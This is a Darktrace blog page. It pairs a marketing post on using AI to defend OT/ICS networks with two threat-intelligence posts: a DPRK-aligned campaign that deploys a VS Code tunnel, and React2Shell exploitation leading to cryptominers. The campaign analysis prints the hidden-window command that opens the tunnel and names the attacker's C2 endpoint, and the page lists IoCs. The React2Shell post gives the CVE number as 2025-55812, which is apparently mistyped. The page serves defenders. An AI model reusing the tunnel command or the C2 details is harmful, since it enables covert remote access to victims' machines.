Blog
/
OT
/
January 9, 2024

Three Ways AI Secures OT & ICS from Cyber Attacks

Explore the three challenges facing industries that manage OT and ICS Systems, the benefits of adopting AI technology, and Darktrace / OT’s unique role!
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Oakley Cox
Director of Product
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
09
Jan 2024

What is OT and ICS?

Operational technologies and industrial control systems are the networked technologies used for the automation of physical processes. These are the technologies that allow operators to control processes and retrieve real time process data from a factory, rail system, pipeline, and other industrial processes.  

The role of AI in defending OT/ICS networks  

While largely adopted by industrial organizations, OT is utilized by Critical Infrastructures, these being the industries that directly affect the health, safety, and welfare of the public. As these organizations expand and adopt new networked industrial technologies, they are simultaneously expanding their attack surface.  

With a larger attack surface, more attacks targeting OT/ICS, and focused coordination around cyber security from regulatory authorities, security personnel have increasing workloads that make it difficult to keep pace with threats and vulnerabilities. Defenders are managing growing attack surfaces due to IT and OT convergence. Thus, the adoption of AI technology to protect, detect, respond, and recover from cyber incidents in industrial systems is paramount for keeping critical infrastructure safe.

This blog will explore three challenges facing industries managing OT/ICS, the perceived benefits of adopting AI technology to address these challenges, and Darktrace/OT’s unique role in this process.  

Darktrace also delivers complete AI-powered solutions to defend US federal government customers from cyber disruptions and ensure mission resilience. Learn more about high fidelity detection in Darktrace Federal’s TAC report.

Figure 1: AI statistics from Gartner and Deloitte

Three ways AI helps improves OT/ICS security  

1. Anomaly detection and response

In this heightened security landscape, OT/ICS environments face a spectrum of external cyber threats that demand vigilant defense. From the looming risk of industrial ransomware to the threat of insiders, yet another dimension is added to security challenge, meaning security professionals must be equipped to detect and respond to internal and external threats.  

While threats are eminent from both inside and outside the organization, many organizations rely on Indicator of Compromises (IOCs) for threat detection. By definition, these solutions can only detect network activity they recognize as an indicator of compromise; therefore, often miss insider threats and novel (zero-day) attacks because the tactics, techniques, and procedures (TTPs) and attack toolkits have never been seen in practice.  

Anomaly-based detection is best suited to combat never-before-seen threats and signatureless threats from the inside. However, not all detection methods are equal. Most anomaly-based detection solutions that leverage AI rely on a combination of supervised machine learning, deep learning, and transformers to train and inform their systems. This entails shipping your company’s data out to a large data lake housed somewhere in the cloud where it gets blended with attack data from thousands of other organizations. This data set gets used to train AI systems — yours and everyone else’s — to recognize patterns of attack based on previously encountered threats.  

While this method reduces the workload for security teams who would have to input attack data otherwise manually, it runs the same risk of only detecting known threats and has potential privacy concerns when shipping this data externally.  

To improve the quality and speed of anomaly detection, Darktrace/OT uses Self-Learning AI that leverages Bayesian Probabilistic Methodologies, Graph Theory, and Deep Neural Networks to learn your organization from the ground up in real time. By learning your unique organization, Darktrace/OT develops a sophisticated baseline knowledge of your network and assets, identifying abnormal activity that indicates a threat based on your unique network data at machine speed. Because the AI engine is local to the organization and/or assets, concerns of data residency and privacy are reduced, and the result is faster time to detect and triage incidents.  

Leveraging Self-Learning AI, Darktrace/OT uses autonomous response that severs only the anomalous or risky behaviors allowing the assets to continue to operate as normal. Organizations work with Darktrace to customize how they want Darktrace’s autonomous response to be applied. These options vary from on a device- by-device basis, device type by device type, or subnet by subnet basis and can be done completely autonomously or in human confirmation mode. This gives security teams more time to respond to an incident and reduces operational downtime when facing a threat.  

Darktrace leverages a combination of AI methods:

  • Self-Learning AI
  • Bayesian classification probabilistic models  
  • Deep neural networks
  • Transformers
  • Graph theory models
  • Clustering models  
  • Anomaly detection models
  • Generative and applied AI  
  • Natural language processing  
  • Supervised machine learning for investigation process of alerts

2. Vulnerability & Asset Management

At present, managing OT cyber risk is labor and resource intensive. Many organizations use third-party auditors to identify assets and vulnerabilities, grade compliance, and recommend improvements.  

At best, these exercises become tick-box exercises for companies to stay in compliance with little measurable reduction in cyber risk. At worst, asset owners can be left with a mountain of vulnerability information to work through, much of it irrelevant to the security risks Engineering and Operations teams deal with day to day, and increasingly out of date each passing day after the annual or biannual audit has been completed.  

In both cases, organizations are left using a patchwork of point products to address different aspects of preventative OT cyber security, most of which lack wider business context and lead to costly inefficiencies with no real impact to vulnerability or risk exposure.  

Darktrace’s technology helps in three unique ways:

  1. AI populates asset inventories: Self-Learning AI technology listens and learns from network traffic to populate or update asset inventories. It does this not just by identifying simple IPs, mac addresses, and hostnames, it learns from what it sees and automatically classifies or tags specific types of assets with the function that they perform. For example, if a specific device is performing functions like a PLC, sending commands to and from an HMI, it can appropriately tag and label these systems.
  2. AI prioritizes risk: Leveraging Bayesian Probabilistic Methodologies, Graph Theory, and Deep Neural Networks, Darktrace/OT assesses the strategic risks facing your organization in real time. Using knowledge of data points on all your networked assets, data flow topology, your assets vulnerabilities and OSINT, Darktrace identifies and prioritizes high-value assets, potential attack pathways based on an existing vulnerabilities targetability and impact.
  3. AI explains remediation tactics: Many OT devices run 24/7 operations and cannot be taken offline to apply a patch, assuming a patch is even available. Darktrace/OT uses natural language processing to provide and explain prioritized remediation and mitigation associated with a given cyber risk across all MITRE ATT&CK techniques. Thus, where a CVE exists but a patch cannot be applied, a different technical mitigation can be recommended to remove a potential attack path before it can be exploited, preemptively securing vital internal systems and assets.
Figure 2: A critical attack path which starts with the compromise of a PC in the internal IT network, and ends with a PLC in the OT network. Each step is mapped out to the real world TTPs including abuse of SSH sessions and the modifications of ICS programs

3. Simplify compliance and reporting

Organizations, regardless of size or resources, have compliance regulations they need to adhere to. What this creates is an increased workload for security professionals. For smaller organizations, security teams might lack the manpower or resources to report in the short time frame that is required. For large organizations, keeping track of a massive amount of assets proves to be a challenge. Both cases emanate the risk of reporting fatigue where organizations might be hesitant to report incidents due to the complexity and time requirements they demand.  

An AI engine within the Darktrace/OT platform, Cyber AI analyst autonomously investigates incidents, summarize findings in natural language, and provides comprehensive insights into the nature and scope of cyber threats to improve the time it takes to triage and report on incidents. The ability to stitch together and present related security events provides a holistic understanding of the incident, enabling security analysts to identify patterns, assess the scope of potential threats, and prioritize responses effectively.  

Darktrace's detection capabilities identify every stage of an intrusion, from a compromised domain controller to network reconnaissance and privilege escalation. The AI technology is capable of detecting infections across several devices and generating incident reports that piece together disparate events to give a clear security narrative containing details of the attack, bridging the communication gap between IT and OT specialists.  

Post-incident, the technology assists in outlining timelines, discerning compromised data, pinpointing unusual activities, and aiding security teams in proactive threat mitigation.  

With its capabilities, organizations can swiftly understand the attack timeline, affected assets, unauthorized accesses, compromised data points, and malicious interactions, facilitating appropriate communication and action. For example, when Cyber AI Analyst shows an attack path, the security team gains insight on the segmentation or lack thereof between two subnets allowing the security team to appropriately segment the subnets.  

Cyber AI improves critical infrastructure operators’ ability to report major cyber-attacks to regulatory authorities. Considering that 72 hours is the reporting period for most significant incidents — and 24 hours for ransomware payments — Cyber AI Analyst is no longer a nice-to-have but a must-have for critical infrastructure.

Figure 3: The tabs labeled 1-4 denote model breaches, each with a specific action and severity indicated by color dots. Darktrace integrates these breaches, offering the security team a unified view of interconnected security events.  

The right AI for the right challenge

Incident Phase:

Protect

Role of AI:

Cyber risk prioritization

Attack path modelling

Compliance reporting

Darktrace Product:

PREVENT/OT

Incident Phase:

Detect

Role of AI:

Anomaly detection

Triaging and investigating

Darktrace Product:

Cyber AI analyst

DETECT/OT

Incident Phase:

Respond

Role of AI: 

Autonomous response  

Incident reporting

Darktrace Product:

RESPOND/OT

Incident Phase:

Recover

Role of AI:

Incident preparedness

Incident simulations

Darktrace Product:

HEAL

Credit to: Nicole Carignan, VP of Strategic Cyber AI - Kendra Gonzalez Duran, Director of Technology Innovation - & Daniel Simonds, Director of Operational Technology for their contribution to this blog.

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Oakley Cox
Director of Product

More in this series

No items found.

Blog

/

Network

/

January 22, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

campaign targeting south orea leveraging vs code for remote accessDefault blog imageDefault blog image

Introduction

Darktrace analysts recently identified a campaign aligned with Democratic People’s Republic of Korea (DPRK) activity that targets users in South Korea, leveraging Javascript Encoded (JSE) scripts and government-themed decoy documents to deploy a Visual Studio Code (VS Code) tunnel to establish remote access.

Technical analysis

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.
Figure 1: Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.

The sample observed in this campaign is a JSE file disguised as a Hangul Word Processor (HWPX) document, likely sent to targets via a spear-phishing email. The JSE file contains multiple Base64-encoded blobs and is executed by Windows Script Host. The HWPX file is titled “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026 (1)” in C:\ProgramData and is opened as a decoy. The Hangul documents impersonate the Ministry of Personnel Management, a South Korean government agency responsible for managing the civil service. Based on the metadata within the documents, the threat actors appear to have taken the documents from the government’s website and edited them to appear legitimate.

Base64 encoded blob.
Figure 2: Base64 encoded blob.

The script then downloads the VSCode CLI ZIP archives from Microsoft into C:\ProgramData, along with code.exe (the legitimate VS Code executable) and a file named out.txt.

In a hidden window, the command cmd.exe /c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene > "C:\ProgramData\out.txt" 2>&1 is run, establishinga VS Code tunnel named “bizeugene”.

VSCode Tunnel setup.
Figure 3: VSCode Tunnel setup.

VS Code tunnels allows users connect to a remote computer and use Visual Studio Code. The remote computer runs a VS Code server that creates an encrypted connection to Microsoft’s tunnel service. A user can then connect to that machine from another device using the VS Code application or a web browser after signing in with GitHub or Microsoft. Abuse of VS Code tunnels was first identified in 2023 and has since been used by Chinese Advance Persistent Threat (APT) groups targeting digital infrastructure and government entities in Southeast Asia [1].

 Contents of out.txt.
Figure 4: Contents of out.txt.

The file “out.txt” contains VS Code Server logs along with a generated GitHub device code. Once the threat actor authorizes the tunnel from their GitHub account, the compromised system is connected via VS Code. This allows the threat actor to have interactive access over the system, with access to the VS Code’s terminal and file browser, enabling them to retrieve payloads and exfiltrate data.

GitHub screenshot after connection is authorized.
Figure 5: GitHub screenshot after connection is authorized.

This code, along with the tunnel token “bizeugene”, is sent in a POST request to https://www.yespp.co.kr/common/include/code/out.php, a legitimate South Korean site that has been compromised is now used as a command-and-control (C2) server.

Conclusion

The use of Hancom document formats, DPRK government impersonation, prolonged remote access, and the victim targeting observed in this campaign are consistent with operational patterns previously attributed to DPRK-aligned threat actors. While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor.

This activity shows how threat actors can use legitimate software rather than custom malware to maintain access to compromised systems. By using VS Code tunnels, attackers are able to communicate through trusted Microsoft infrastructure instead of dedicated C2 servers. The use of widely trusted applications makes detection more difficult, particularly in environments where developer tools are commonly installed. Traditional security controls that focus on blocking known malware may not identify this type of activity, as the tools themselves are not inherently malicious and are often signed by legitimate vendors.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendix

Indicators of Compromise (IoCs)

115.68.110.73 - compromised site IP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001 - Phishing: Attachment

T1059 - Command and Scripting Interpreter

T1204.002 - User Execution

T1027 - Obfuscated Files and Information

T1218 - Signed Binary Proxy Execution

T1105 - Ingress Tool Transfer

T1090 - Proxy

T1041 - Exfiltration Over C2 Channel

References

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Continue reading
About the author

Blog

/

/

January 19, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly

React2Shell Default blog imageDefault blog image

Introduction

Last month’s disclosure of CVE 2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.  

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE 2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction.  No phishing campaign, no credential theft, and no lateral movement are required; only an exposed service and exploitable condition.

The activity Darktrace observed during the React2shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or to burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMrig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark

The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.
Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. This directly ties the payload execution to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was availability on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korean affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRat, a previously undocumented Linux implant, highlights the need for updated rules and signatures for organizations that rely on them.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.

Read more finance‑sector insights in Darktrace’s white paper, The State of Cyber Security in the Finance Sector.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online, demonstrating how automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting reflects a mature, well‑resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
Your data. Our AI.
Elevate your network security with Darktrace AI